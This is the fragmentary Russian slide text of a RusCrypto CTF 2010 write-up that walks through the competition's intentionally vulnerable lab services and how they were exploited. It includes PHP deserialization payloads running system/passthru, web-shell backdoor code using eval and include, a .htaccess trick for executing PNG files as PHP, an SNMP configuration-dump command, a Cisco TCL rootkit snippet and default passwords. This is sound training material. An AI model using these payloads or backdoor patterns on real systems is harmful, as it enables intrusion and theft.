РусКрипто CTF 2010, Full Disclosure (мастер класс)

План мероприятия
Подробности подготовки и проведения CTF
Заложенные уязвимости, пути их обнаружения и эксплуатации
Практические

Подробности подготовки и проведения CTF

РусКрипто CTF 2010

РусКрипто CTF — это открытые соревнования по защите информации, проводимые

РусКрипто CTF 2010: Дизайн игровой сети

РусКрипто CTF 2010: Как все было устроено «изнутри»

Инфраструктуры команд работали на двух

РусКрипто CTF 2010: Распределение игровой инфраструктуры

РусКрипто CTF 2010: Топология игровой сети

РусКрипто CTF 2010: Как все было устроено «изнутри»

Использовалось следующее программное обеспечение:
VMWare ESX

РусКрипто CTF 2010: еще разок поблагодарим спонсоров

Заложенные уязвимости, пути их обнаружения и эксплуатации

РусКрипто CTF 2010

Подготовленные сервисы:
Корпоративный сайт (jail1)
Служба информирования доставщиков (jail2)
Система документооборота (jail3)
Сервис управления

РусКрипто CTF 2010: Корпоративный сайт

РусКрипто CTF 2010: Корпоративный сайт (st0)

SQL Injection (MySQL 5.x) в Insert (default

РусКрипто CTF 2010: Корпоративный сайт (st0)

SQL Injection (MySQL 5.x) в Insert (default

РусКрипто CTF 2010: Корпоративный сайт (st0)

Подбор + File Including в cookie (default

РусКрипто CTF 2010: Корпоративный сайт (st0)

Подбор + File Including в cookie (default

РусКрипто CTF 2010: Корпоративный сайт

Подбор (default information leakage) + Cross-Site Scripting
Содержимое

РусКрипто CTF 2010: Корпоративный сайт (st1)

Выполнение команд на сервере over unserialize()
Потенциально уязвимый

РусКрипто CTF 2010: Корпоративный сайт (st1)

Выполнение команд на сервере over unserialize()
Эксплуатация:
O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:7:"phpinfo";i:1;s:2:"-1";}}
cookie[sessid]=Tzo4OiJEYXRhYmFzZSI6MTp7czo4OiJzaHV0ZG93biI7YToyOntpOjA7czo3OiJwaHBpbmZvIjtpOjE7czoyOiItMSI7fX0NCg==
O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:6:"system";i:1;s:2:"ls";}}
cookie[sessid]=Tzo4OiJEYXRhYmFzZSI6MTp7czo4OiJzaHV0ZG93biI7YToyOntpOjA7czo2OiJzeXN0ZW0iO2k6MTtzOjI6ImxzIjt9fQ0KDQo=
O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:8:"passthru";i:1;s:17:"cat /YOURFLAG.TXT";}}
cookie[sessid]=Tzo4OiJEYXRhYmFzZSI6MTp7czo4OiJzaHV0ZG93biI7YToyOntpOjA7czo4OiJwYXNzdGhydSI7aToxO3M6MTc6ImNhdCAvWU9VUkZMQUcuVFhUIjt9fQ==

РусКрипто CTF 2010: Корпоративный сайт (st2)

3 back-door over web-shell

РусКрипто CTF 2010: Корпоративный сайт (st2)

…
if(@$_GET['v'])include(@$_GET['v']);
…
http://192.168.0.1/bak_index.php?v=/YOURFLAG.TXT
…
@$_REQUEST['a'])?eval($_REQUEST['h']($_REQUEST['a'])):0;
…
http://192.168.0.1/img.php?h=passthru&a=cat%20/YOURFLAG.TXT
.htaccess
AddType application/x-httpd-php .png
http://192.168.0.1/fonts/footevening.png

Дополнительные уязвимости
Раскрытие конфиденциальных данных (/config.inc, /test.php, /phpinfo.php)
Раскрытие конфиденциальной информации (display_errors=off, etc)
Подбор (/admin.php,

Практическое занятие часть 1

http://192.168.0.1/
Обнаружить уязвимость типа «Внедрение операторов SQL».
Воспользоваться уязвимостью «Внедрение операторов

РусКрипто CTF 2010: Служба информирования доставщиков

РусКрипто CTF 2010: Служба информирования доставщиков (st0)

Классическая SQL Injection (PostgreSQL)
Уязвимое regexp:
from django.conf.urls.defaults

РусКрипто CTF 2010: Служба информирования доставщиков (st0)

Классическая SQL Injection (PostgreSQL)

РусКрипто CTF 2010: Служба информирования доставщиков (st1)

Выполнение команд на сервере over AJAX
Уязвимый

Дополнительные уязвимости
XPath Injection
Open Proxy
Подбор (раздел администрирования)
Недостаточное противодействие автоматизации в форме обратной связи
Отсутствие

РусКрипто CTF 2010: Система документооборота

РусКрипто CTF 2010: Система документооборота

Выход за пределы каталога (path traversal)
Фрагмент уязвимого

«Бонусный флаг»
61h,62h,63h...-> a,b,c...

РусКрипто CTF 2010: Система документооборота

Переполнение буфера (buffer overflow)
Фрагмент уязвимого кода:
...
char tmp[8192];
tmp[0]=1;
...
while(1) {
tmp[1]=tmp[0]++;
...
void handle_connection(int sockfd, struct sockaddr_ in

Переполнение буфера (buffer overflow)

РусКрипто CTF 2010: Система документооборота

Дополнительные уязвимости
Процесс работает под привилегированной учетной записью (uid0)
Подбор и недостаточная аутентификация (используется

РусКрипто CTF 2010: Сервис управления датчиками

Получение пароля к сервису

РусКрипто CTF 2010: Сервис управления датчиками

Однобайтовое переполнение
Фрагмент уязвимого кода:
...
char cmd[50]; //was 4096
...
nb = anetRead(cli->fd, cmd, 140);
...
else if

«Бонусный флаг»

РусКрипто CTF 2010: Сервис управления датчиками

Дополнительные уязвимости
Процесс работает под привилегированной учетной записью (uid0)
Не используется криптографическая защита
Подбор
Уязвимые конфигурации

Задания для самостоятельного выполнения

В раздаточном материале содержится:
Исходный код «Системы документооборота»
Исходный код «Сервиса

РусКрипто CTF 2010: Тестовый сервер

Подбор (множество интерфейсов)
Доступные протоколы:
login/shell/telnet/ssh,
mysql,
ftp (доступ к корневому каталогу веб-сервера)
Учетные

SQL Injection/File Including/XSS
/bitrix/admin/index.php -> admin:123456

РусКрипто CTF 2010: Тестовый сервер

Back-door (выполнение команд на сервере)
[~] cat /etc/crontab
...
*/5 * * * * root

Дополнительные уязвимости
Раскрытие конфиденциальной информации (display_errors=off)
Подбор (/bitrix/admin/, etc)
…

РусКрипто CTF 2010: Тестовый сервер

Уязвимые конфигурации

РусКрипто CTF 2010: Точка беспроводного доступа
Даже с отключенными настройками безопасности (включая IPS)

РусКрипто CTF 2010: Коммутатор Cisco

Подбор
Cisco/Cisco; enable zxasqw
Выгрузка конфигурации через SNMP
snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337

Cisco TCL rootkit
…
if { [regexp {^(show|sh) flag\s*(.*)$} $line]} {
puts $sock "Flag:

Дополнительные уязвимости и соответствие CIS

РусКрипто CTF 2010: Коммутатор Cisco

Практическое занятие часть 2

(192.168.0.10) Cisco
Провести выгрузку используемой конфигурации через протокол SNMP.
Осуществить доступ

РусКрипто CTF 2010: Windows

РусКрипто CTF 2010: Windows 2003

Вектор 1 (долгий):
Подобрать пароль к Radmin (pw: 11111111)
Обезвредить SMS-вирус (http://www.esetnod32.ru/.support/winlock/, http://www.drweb.com/unlocker/, http://support.kaspersky.ru/viruses/deblocker)
Обнаружить

К слову об уязвимостях…

РусКрипто CTF 2010: Windows 2003

Подбор пароля к C$ (например, xsharez)
Восстановление данных из PWL-файла администратора (например, repwl)

РусКрипто

Хронология событий

РусКрипто CTF 2010: Хронология начисления баллов на протяжении всего соревнования

РусКрипто CTF 2010: Динамика начисления баллов

Бледно-красным цветом выделено максимальное значение в пределах

РусКрипто CTF 2010: Доля незахваченных флагов
Команда Bushwhackers защищалась лучше всех.

РусКрипто CTF 2010: Баллы, полученные за захват флагов
Команда Bushwhackers опередила команду ХакерДом

РусКрипто CTF 2010: Обеспечение доступности всех сервисов

Команда Huge Ego Team стала первой

РусКрипто CTF 2010: Резюме

Не все было так, как хотелось, но было весело